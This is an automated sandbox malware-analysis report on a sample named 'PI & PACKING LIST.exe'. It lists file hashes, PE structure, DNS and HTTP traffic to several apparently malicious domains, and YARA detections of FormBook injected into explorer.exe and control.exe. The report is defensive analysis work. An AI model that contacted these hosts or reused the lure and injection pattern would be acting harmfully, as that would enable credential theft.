                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                        C:\Users\user\AppData\Local\Temp\71M40-2OQ

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\control.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                        Category:dropped
                                                        Size (bytes):94208
                                                        Entropy (8bit):1.2882898331044472
                                                        Encrypted:false
                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.599851542938325
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:PI & PACKING LIST.exe
                                                        File size:1030144
                                                        MD5:36fbb21511e87e8dddc8916cc2dc9367
                                                        SHA1:eda2fa3fe4b62fe3d564cf492cc31a875e8f1922
                                                        SHA256:937c7c476bb363e55fdf1ff275c87de91ec0f550072e9a759387cc95e6c78c83
                                                        SHA512:85aa4905d89f42acc75d9a31806d16a84ffca0bbd4aaf9b9605d98adc8ff66544616afd8705c9c5295a9153930f1be1d58c6556f9c244e1be163218c42336dc7
                                                        SSDEEP:24576:s1uqqdOC2CIep1Vtcl6gIGVfeSvopbGCh9XV:sbqdO+IAInVnFCh9X
                                                        TLSH:06256BCB2F300E84CB5F34715C8D1B8861823DA149F59CF22B756A786E564FFA69227C
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.|c..............0.................. ........@.. ....................... ............@................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4fccde
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x637CBC3E [Tue Nov 22 12:10:38 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add dword ptr [eax], eax
                                                        add byte ptr [eax], al
                                                        add al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add dword ptr [eax], eax
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xfcc8c0x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xfe0000x388.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1000000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xfae0c0xfb000False0.8133160716508964data7.603845618377083IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xfe0000x3880x400False0.3818359375data2.865449669398995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1000000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_VERSION0xfe0580x32cdata

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 30, 2022 01:56:30.435599089 CET4969980192.168.2.335.78.89.117
                                                        Nov 30, 2022 01:56:30.690313101 CET804969935.78.89.117192.168.2.3
                                                        Nov 30, 2022 01:56:30.690747023 CET4969980192.168.2.335.78.89.117
                                                        Nov 30, 2022 01:56:30.690953016 CET4969980192.168.2.335.78.89.117
                                                        Nov 30, 2022 01:56:30.945398092 CET804969935.78.89.117192.168.2.3
                                                        Nov 30, 2022 01:56:30.945488930 CET804969935.78.89.117192.168.2.3
                                                        Nov 30, 2022 01:56:30.945538044 CET804969935.78.89.117192.168.2.3
                                                        Nov 30, 2022 01:56:30.945661068 CET4969980192.168.2.335.78.89.117
                                                        Nov 30, 2022 01:56:30.945851088 CET4969980192.168.2.335.78.89.117
                                                        Nov 30, 2022 01:56:31.200309992 CET804969935.78.89.117192.168.2.3
                                                        Nov 30, 2022 01:56:36.075532913 CET4970080192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:36.203886986 CET8049700178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:36.207110882 CET4970080192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:36.207313061 CET4970080192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:36.339452982 CET8049700178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:36.339534998 CET8049700178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:36.339648962 CET8049700178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:36.339735985 CET4970080192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:37.213046074 CET4970080192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:38.230366945 CET4970180192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:38.356884956 CET8049701178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:38.357409954 CET4970180192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:38.358261108 CET4970180192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:38.485125065 CET8049701178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:38.485260010 CET8049701178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:38.485310078 CET8049701178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:38.485519886 CET4970180192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:39.369651079 CET4970180192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:40.385653019 CET4970280192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:40.512706995 CET8049702178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:40.513171911 CET4970280192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:40.513289928 CET4970280192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:40.639802933 CET8049702178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:40.640072107 CET8049702178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:40.640115023 CET8049702178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:40.640268087 CET4970280192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:40.640450954 CET4970280192.168.2.3178.128.239.245
                                                        Nov 30, 2022 01:56:40.766827106 CET8049702178.128.239.245192.168.2.3
                                                        Nov 30, 2022 01:56:46.443892002 CET4970380192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:46.717799902 CET8049703162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:46.718111038 CET4970380192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:46.718338966 CET4970380192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:46.992011070 CET8049703162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:46.993747950 CET8049703162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:46.993794918 CET8049703162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:46.993834972 CET8049703162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:46.993962049 CET4970380192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:46.993962049 CET4970380192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:47.730102062 CET4970380192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:48.746025085 CET4970480192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:49.020411968 CET8049704162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:49.020566940 CET4970480192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:49.025969982 CET4970480192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:49.300954103 CET8049704162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:49.302470922 CET8049704162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:49.302534103 CET8049704162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:49.302563906 CET8049704162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:49.302881002 CET4970480192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:50.026726007 CET4970480192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:51.043955088 CET4970580192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:51.317914963 CET8049705162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:51.318133116 CET4970580192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:51.318274021 CET4970580192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:51.593318939 CET8049705162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:51.594609022 CET8049705162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:51.594669104 CET8049705162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:51.594719887 CET8049705162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:51.594772100 CET4970580192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:51.594810009 CET4970580192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:51.595088005 CET4970580192.168.2.3162.43.120.154
                                                        Nov 30, 2022 01:56:51.869878054 CET8049705162.43.120.154192.168.2.3
                                                        Nov 30, 2022 01:56:56.655076981 CET4970680192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:56:56.672187090 CET8049706142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:56.672312021 CET4970680192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:56:56.672535896 CET4970680192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:56:56.689588070 CET8049706142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:56.798434973 CET8049706142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:56.798474073 CET8049706142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:56.798841953 CET4970680192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:56:57.683523893 CET4970680192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:56:58.700560093 CET4970780192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:56:58.717950106 CET8049707142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:58.718117952 CET4970780192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:56:58.718626976 CET4970780192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:56:58.736681938 CET8049707142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:58.736748934 CET8049707142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:58.736793995 CET8049707142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:58.736835003 CET8049707142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:58.736877918 CET8049707142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:58.845972061 CET8049707142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:58.846035957 CET8049707142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:56:58.846225023 CET4970780192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:56:59.730948925 CET4970780192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:57:00.747503996 CET4970880192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:57:00.764229059 CET8049708142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:57:00.764373064 CET4970880192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:57:00.764707088 CET4970880192.168.2.3142.250.203.115
                                                        Nov 30, 2022 01:57:00.781295061 CET8049708142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:57:00.891392946 CET8049708142.250.203.115192.168.2.3
                                                        Nov 30, 2022 01:57:00.891453028 CET8049708142.250.203.115192.168.2.3

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 30, 2022 01:56:25.364172935 CET4997753192.168.2.38.8.8.8
                                                        Nov 30, 2022 01:56:25.383728981 CET53499778.8.8.8192.168.2.3
                                                        Nov 30, 2022 01:56:30.406841040 CET5784053192.168.2.38.8.8.8
                                                        Nov 30, 2022 01:56:30.430402040 CET53578408.8.8.8192.168.2.3
                                                        Nov 30, 2022 01:56:35.953828096 CET5799053192.168.2.38.8.8.8
                                                        Nov 30, 2022 01:56:36.071085930 CET53579908.8.8.8192.168.2.3
                                                        Nov 30, 2022 01:56:46.184161901 CET5238753192.168.2.38.8.8.8
                                                        Nov 30, 2022 01:56:46.442496061 CET53523878.8.8.8192.168.2.3
                                                        Nov 30, 2022 01:56:56.621620893 CET5692453192.168.2.38.8.8.8
                                                        Nov 30, 2022 01:56:56.653685093 CET53569248.8.8.8192.168.2.3
                                                        Nov 30, 2022 01:57:05.922028065 CET6062553192.168.2.38.8.8.8
                                                        Nov 30, 2022 01:57:06.161883116 CET53606258.8.8.8192.168.2.3

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 30, 2022 01:56:25.364172935 CET192.168.2.38.8.8.80x79b8Standard query (0)www.gebouwpas.onlineA (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:56:30.406841040 CET192.168.2.38.8.8.80x2c63Standard query (0)www.zkjk888.comA (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:56:35.953828096 CET192.168.2.38.8.8.80x2c27Standard query (0)www.cpitherapy.comA (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:56:46.184161901 CET192.168.2.38.8.8.80xbf1aStandard query (0)www.p-soils.comA (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:56:56.621620893 CET192.168.2.38.8.8.80xd877Standard query (0)www.bengalindex.comA (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:57:05.922028065 CET192.168.2.38.8.8.80x7a2eStandard query (0)www.nu2uresale.storeA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 30, 2022 01:56:25.383728981 CET8.8.8.8192.168.2.30x79b8Name error (3)www.gebouwpas.onlinenonenoneA (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:56:30.430402040 CET8.8.8.8192.168.2.30x2c63No error (0)www.zkjk888.com35.78.89.117A (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:56:36.071085930 CET8.8.8.8192.168.2.30x2c27No error (0)www.cpitherapy.com178.128.239.245A (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:56:46.442496061 CET8.8.8.8192.168.2.30xbf1aNo error (0)www.p-soils.com162.43.120.154A (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:56:56.653685093 CET8.8.8.8192.168.2.30xd877No error (0)www.bengalindex.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                        Nov 30, 2022 01:56:56.653685093 CET8.8.8.8192.168.2.30xd877No error (0)ghs.googlehosted.com142.250.203.115A (IP address)IN (0x0001)false
                                                        Nov 30, 2022 01:57:06.161883116 CET8.8.8.8192.168.2.30x7a2eNo error (0)www.nu2uresale.store209.99.64.33A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.zkjk888.com
                                                        • www.cpitherapy.com
                                                        • www.p-soils.com
                                                        • www.bengalindex.com
                                                        • www.nu2uresale.store

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:01:55:00
                                                        Start date:30/11/2022
                                                        Path:C:\Users\user\Desktop\PI & PACKING LIST.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\PI & PACKING LIST.exe
                                                        Imagebase:0xd0000
                                                        File size:1030144 bytes
                                                        MD5 hash:36FBB21511E87E8DDDC8916CC2DC9367
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Target ID:1
                                                        Start time:01:55:08
                                                        Start date:30/11/2022
                                                        Path:C:\Users\user\Desktop\PI & PACKING LIST.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\Desktop\PI & PACKING LIST.exe
                                                        Imagebase:0x3a0000
                                                        File size:1030144 bytes
                                                        MD5 hash:36FBB21511E87E8DDDC8916CC2DC9367
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        General

                                                        Target ID:2
                                                        Start time:01:55:08
                                                        Start date:30/11/2022
                                                        Path:C:\Users\user\Desktop\PI & PACKING LIST.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\PI & PACKING LIST.exe
                                                        Imagebase:0x720000
                                                        File size:1030144 bytes
                                                        MD5 hash:36FBB21511E87E8DDDC8916CC2DC9367
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.353618597.0000000000C60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Target ID:3
                                                        Start time:01:55:10
                                                        Start date:30/11/2022
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff69fe90000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:high

                                                        General

                                                        Target ID:13
                                                        Start time:01:55:49
                                                        Start date:30/11/2022
                                                        Path:C:\Windows\SysWOW64\control.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\control.exe
                                                        Imagebase:0x1360000
                                                        File size:114688 bytes
                                                        MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

